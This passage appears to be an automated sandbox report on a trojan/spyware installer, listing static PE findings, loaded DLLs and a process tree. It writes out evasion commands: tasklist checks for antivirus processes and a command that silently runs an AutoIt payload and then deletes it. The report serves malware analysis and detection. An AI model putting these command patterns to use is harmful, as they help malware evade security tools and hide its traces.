Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040BD70	36_2_0040BD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00429D00	36_2_00429D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040ADD0	36_2_0040ADD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00432D80	36_2_00432D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00408DA0	36_2_00408DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00422E50	36_2_00422E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00416E10	36_2_00416E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042BE10	36_2_0042BE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00442EB0	36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00406F60	36_2_00406F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00428F00	36_2_00428F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00408DA0	36_2_00408DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00426F82	36_2_00426F82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00434F80	36_2_00434F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00441F80	36_2_00441F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00409F9C	36_2_00409F9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00404FA0	36_2_00404FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00409FA8	36_2_00409FA8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0041C2A0 appears 176 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0040C8C0 appears 71 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: String function: 00B2FA3B appears 33 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: String function: 00B4488E appears 34 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: String function: 00B41000 appears 41 times
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: String function: 00B4014F appears 40 times

Source: file.exe

Static PE information: invalid certificate

Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: file.tmp.0.dr	Static PE information: Number of sections : 11 > 10
Source: file.tmp.2.dr	Static PE information: Number of sections : 11 > 10
Source: file.exe	Static PE information: Number of sections : 11 > 10

Source: is-EUGF2.tmp.3.dr	Static PE information: No import functions for PE file found
Source: is-5MQFH.tmp.3.dr	Static PE information: No import functions for PE file found

Source: file.exe, 00000000.00000003.1677553862.000000007FB6A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000003.1676905528.000000000337E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000000.1675519930.0000000001059000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe	Binary or memory string: \OriginalFileName vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamewebpconverter.exeP vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@60/28@1/2

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B94573 GetLastError,FormatMessageW,

35_2_00B94573

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B821C9 AdjustTokenPrivileges,CloseHandle,		35_2_00B821C9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B827D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		35_2_00B827D9

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B95D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

35_2_00B95D7E

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B8E2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle,

35_2_00B8E2AB

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B88056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,

35_2_00B88056

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B93DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

35_2_00B93DBD

Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp

File created: C:\Users\user\AppData\Local\hangbird

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: file.exe	String found in binary or memory: /LOADINF="filename"
Source: file.exe	String found in binary or memory: ] [json.exception.parse errorparse_error, column at line invalid_iteratortype_errorout_of_rangeother_errorSeIncreaseQuotaPrivilege" \bin\EnableVROverlay_x64.exe -dt -nvft -spmon -excludelist_file "\ExcludeList.overlay.txt" \bin\PresentMon_x64.exe -timed -terminate_after_timed -hotkey SCROLLLOCK -output_file "\FrameView.csv" -frameview -multi_csv -stop_existing_session -session_name FrameViewService -dont_restart_as_admin \ExcludeList.txt" -exclude dwm.exe -session_name -spawnprovider -spawnconsumer -terminate_existing signaturedb\NVIDIA Corporation\FrameViewSDK\downloader\mouseLut.json\..\bin\mouseLut.json\bin\nvrla.exe -e \bin{}{
Source: file.exe	String found in binary or memory: FrameView SDK service-uninstallFvSvc-service-testservice-install-startRSA1
Source: file.exe	String found in binary or memory: FrameView SDK service-uninstallFvSvc-service-testservice-install-startRSA1
Source: file.exe	String found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: file.exe	String found in binary or memory: application/vnd.groove-help
Source: file.exe	String found in binary or memory: "application/x-install-instructions

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3x
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3x	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Section loaded: sspicli.dll	Jump to behavior
